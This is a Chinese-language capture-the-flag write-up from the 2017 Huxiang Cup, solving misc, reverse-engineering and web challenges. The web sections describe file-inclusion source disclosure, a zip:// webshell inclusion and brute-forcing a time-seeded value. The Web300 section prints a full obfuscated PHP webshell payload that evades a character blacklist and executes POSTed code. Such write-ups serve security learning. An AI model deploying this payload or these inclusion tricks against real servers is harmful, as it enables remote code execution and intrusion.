2017年 “湖湘杯”网络安全技能大赛部分Writeup

MISC

热身运动

一张gif动图，通过命令convert pink.gif output.png对分割每一帧图片，看到跳跳虎的每个坐标位置，写成文本,图片及转换好的文本如下：

5B4G2B4B5B2H3E2B5F8F1E2B7F6F1F4G5F6G1B3G5G6H2E
搜索64进制，得到一张图片，跟跳跳虎的8*8类似，把坐标转换成数字

25 38 49 33 25 55 44 49 29 5 60 49 13 21 61 38 29 22 57 46 30 23 52
Base64也是0-63索引，将数字字符串转成base64，base64表和转换好的文本如下：

ZmxhZ3sxdF8xNV9mdW5ueX0
再把转换好的文本进行base64解码，得到flag

Encryptor.apk

下载后得到一个加密的apk和加密后的flag文件，安装apk后发现apk名字是image加密者，估计是对jpg图片进行加密，先进行反编译，打开解密的算法未发现突破点。

因为解密代码并没有什么实质的部分，只好去看看加密代码的这一块。

发现这里对输入的文件进行了异或，异或是可逆的，只要对加密文件再加密一次就可以得到flag，于是改后缀为jpg，对文件再次进行加密。

得到了加密后的文件，改回后缀名jpg，打开图片得到flag。

MISC300

下载得到一个pixels.jpg.pkl文件，然后通过cPickle写的脚本读取文件的内容：

提示是一个黑白图片，list上是坐标，然后通过修改代码生成图片,脚本代码和生成的图片如下：


本来以为生成图片之后能够直接看到flag，但是并没有，通过搜索得到原题，flag是“加尔文和霍布斯”漫画的作者是“比尔•沃特森” ，输入billwatterson，提交得分。

流量分析

通过wireshark打开流量包，输入过滤规则：tcp contains "flag"，然后看到HTTP流量中存在一个flag.zip，通过HTTP对象导出flag.zip


解压flag.zip文件后发现一个文本ce.txt,里面是RGB的信息。

通过编辑RGB画图脚本生成图片,脚本代码如下：

生成图片，得到flag。

Reverse

Re4newer

下载之后，放入peid查壳，发现是upx的壳，好办，直接扔进脱壳机。

脱壳之后放入神器ida。

搜索字符串发现了成功和失败的字样，进去look look。

一共是44次循环，每一次都将数据与0x22进行异或，去v4到v14中，把数据拿出来之后写脚本，得到flag。

脚本代码如下：

简单的安卓

下载之后直接反编译，可以在入口处看到flag，真的很简单23333

Web

Web200

根据题目提示，上传一个PNG文件，服务器就会保存它。然后随便上传了一个png文件，发现302，什么东西都没有。访问首页发现 op是一个get参数，尝试其他特殊字符，接着给我弹出来一个

吓了宝宝一跳，不要怂就是干，然后尝试文件包含读index.php，读到源码

通过include以及存在的链接，然后读upload.php，发现common.php继续读，尝试读flag.php，flag直接出来了,233333

后面读源码发现还有其他方法，绕过上传图片使用zip://包含webshell也可以任意执行命令，从而读取flag.php，查看源码后发现flag。
flag截图如下:

Random

打开首页发现要输入一个随机值，尝试刷新，发现页面有变化，但不知道算法，爆破不了，题目未改之前通过swp查找源码都没找到，后面题目改了一下，通过swp源码泄露读到源码。

randpwd随机生成，跟time()有关，开始构造代码进行爆破，获取网页内容并打印出来。

经过一段时间爆破，得到flag，截图如下:

Web300

打开首页，对源代码进行分析，发现黑名单过滤了很多字符，参数传值不在黑名单会直接写入文件中，文件名随机生成，经过测试还有几个字符没有进行过滤，例如$_()[]+’; , 然后开始构造webshell。
由于+在传送中会被解释为空格，所以需要提前url编码为%2b
Payload:

$_='';$_[%2b$_]%2b%2b;$_=$_.'';$__=$_[%2b''];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____='_';$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]); 

通过content传参，成功后会得到一个shell的地址。
http://x.x.x.x/?content=payload
打开shell地址，post数据过去,查看源码读到flag。如下图：

参考链接：一道好玩的webshell题

转载请保留原文链接及作者。
本文总阅读量：次